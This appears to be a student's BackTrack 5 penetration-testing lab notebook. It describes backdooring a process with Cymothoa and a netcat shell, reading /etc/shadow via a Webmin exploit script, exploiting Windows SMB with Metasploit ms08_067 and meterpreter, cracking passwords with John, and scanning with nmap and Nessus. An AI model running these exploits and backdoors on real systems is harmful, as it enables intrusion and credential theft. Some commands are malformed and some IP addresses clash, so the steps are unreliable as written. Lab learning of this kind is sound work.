Backdooring with Backtrack to Ubuntu

1. Open the Cymothoa 

    and type #nc -l -p 8888 -e > cy /bin/bash for listining

2. And a victim target type #nc 192.168.43.1 8888

. 

3. At console type ./cymothoa and at victim target display cymothoa

 

4. type ps -aux for report proses status 

 

 5. Type #./cymothoa -p 20575 -s 0 -y 8888

      and a target was infected.

Crack a Passowrd with John

1. Open john at #/pentest/password/john and type enter

2. Ttype #./john -u userpass for increase time for crack 

3. Wait a minute for search passwd. And i cannot seem the password :((

How to Find /etc/shadow at Server

1. Open Nessus Aplicaktion and type ip address 192.168.0.112

    you have obtain data required for later stages.

2. Check port with browser example http://192.168.0.112:10000

3. Open console and type #nmap -A -T4 192.168.0.122. And we find http,
    httpd, mini serve, webmin for exploit.

 4. Test webmin wit explitdb for search BruteForch and Arbitary

5. You can see file 2017.pl at /multiple/remote/2017.pl
    use #cp platform/multiple/remote/2017.pl for copy file and directory

6. Type #perl 2017.pl for find /etc/passwd

7. Type #cat /etc/passwd for display text file at passwd

8. Type #cat /etc/shadow for display text file at shadow

    and we have got /etc/shadow. :))

How to Get Windows Use Metasploit

1. Open Autoscan on backtrack application for search ip address.

2. Open Nessus to known a vulnerability.

3. Search port which have a weakness for exploitation and klik 445/tcp which have gap vulnerability.

4. Open a terminal and type #nmap -A T4 192.168.56.101

     and you can see port 135, 139 and 445. You can analysis for each file on port.

5. Open a terminal and type "#msfconsole" to entry metasploit

6. Type #use Windows/smb/ms08_067_netapi

    at "Windows/smb/ms08_067_netapi is Vulnerability on windows 

    after that type #show options

7. Type "#set RHOST 192.168.56.101" for  determine target for exploit

    and than type "#set payload windows/meterpreter/bind_tcp"

    last type "#exploit " for known the result exploit

     and we have been sucessfully into windows. :)

How to Vulnerbility Assessment with Exploit

1. Open Autoscan on backtrack application for search ip address:

2. Open Nessus to known vulnerability :

3. Search port which have a weakness for expoitation :

4. Klik port 445/tcp which have gap a weakness :

5. Klik "download report" for analysis Vulnerability Assessment :

6. Open terminal and type #nmap -A -T4 192.168.0.67 for more detail port and type file for exploit :

    and you can see port 21, 22, 23, 25, 53, and 80. You can analysis for each file on port

7. Example we type " #./searchexploit samba " for exploit file samba.

8. If there are files suspicious for exploit use the command : 

    #gcc file.c -o file  ( for file ekstension .c )

    #python file.py     ( for file ekstension python )

    #pearl file.pl         ( for file ekstension pearl ) .

  

How to Install Nessus on Backtrack 5

1. Open terminal and type #apt-get install Nessus

 2. Go to Bacuktrack Menu > Vulnerability Assesment > Vulnerability
     Scanner > Nessus Register.

 
3. Click Agree

4.  Type in terminal # /opt/nessus/bin/nessus-fetch --register <registration
      number> to activate nessus

5. Open browser and go to https://localhost:8834 and  installation is finish

How to Use URL with Information Gathering

1. I Use Mantra to find Information about http://is2c-dojo.com

   
2. I Use Whois to find Information about http://is2c-dojo.net

 

3. I Use Dirbuster to find Information about http://spentera.com

   

How To Use Information Gathering

 1. I will learn about nmap
     Open menu > Apps  > Informatin Gathering > Network Analysis > SMTP
     Analysis > nmap
     A. type #nmap 192.168.0.21
         and result is: 

  
     B. type #nmap -sV -O 192.168.0.21
         and result is:

   
    C. type # nmap -A -T4 192.168.0.21
         and result is:

2. I will learn about Autoscan
    Open menu > Apps > Informatin Gathering > Network Analysis >
    Network Scanner > Autoscan

                                                      klik Forward

                                   Choose "localhost" and klik forward

                                                    klik forward

                                               and final result is

3. I will learn about Zenmap
    Open Menu > Apps > Information Gathering > network Analysis > OS
    Fingerprint > Zenmap
    type target : 192.168.0.0-254
    profil : regular scan
    and result is :

4 . Last, i will learn about netifera    
     Open menu > Apps > Information Gathering > Network Analysis >
     Network Scanner > Netifera
     Type target  : 192.168.0.21

      
    

    




















   

Install Operating System on Virtualbox

A. How to install Virtualboox

1. Open a Virtualbox and click "new"
2. Click "next" than type the name of virtual which you want the operating system, choose microsoft and the version take Windows XP.
3. Manage your memory and click "next"
4. Choose "create a new harddisk" and click "Next"
5. Click "Next" at create a new virtual disk wizard
6. Choose "dynamically expanding storage" and click 'Next'
7. Manage space on you hard disk and click "Next"
8. Click "finish" than start
9. After finished the installation Windows XP, we will connected to the Backtrack as the host.
10. Choose file menu (click) than click preference. 
11. Than the interface of  virtualbox-setting show up, than choose network menu and click "ok".
12. Choose setting network on the box "Attached to" take Host-only Adapter and click "ok". 
13. Click start button to running windows xp in virtualbox.
14. Open the command line in windows xp than type "ipconfig" to know the ip address guest=.198.168.1.122
15. Open the terminal on the backtrack and than type "ifconfig" to know the ip address host = 198.168.43.128
16. after we get all the ip we can try to connect between host and guest with type ping "to the ip address destination". example from the guest to the host : ping 192.168.43.128
16. If from the host to the guest we have trouble to connect it the solution is off the firewall inside of the windows setting.

B. How to Ubuntu in Virtualbox

1. Open a Virtualbox and click "new"
2. Click "next" than type the name of virtual which you want the operating system, choose microsoft and the version take Ubuntu.
3. Manage your memory and click "next"
4. Choose "create a new harddisk" and click "Next"
5. Click "Next" at create a new virtual disk wizard
6. Choose "dynamically expanding storage" and click 'Next'
7. Manage space on you hard disk and click "Next"
8. Click "finish" than start
9. After finished the installation Ubuntu, we will connected to the Backtrack as the host.
10. Choose file menu (click) than click preference. 
11.Than the interface of  virtualbox-setting show up, than choose network menu and click "ok".
12. Choose setting network on the box "Attached to" take Host-only Adapter and click "ok". 
13. Click start button to running windows xp in virtualbox.
14. Open the command line in Ubuntu than type "ifconfig" to know the ip address guest= 198.168.1.122
15. Open the terminal on the backtrack and than type "ifconfig" to know the ip address host = 198.168.43.128
16. After we get all the ip we can try to connect between host and guest with type ping "to the ip address destination". example from the guest to the host : ping 198.168.43.128
17. If from the host to the guest we have trouble to connect it the solution is off the firewall inside of the windows setting.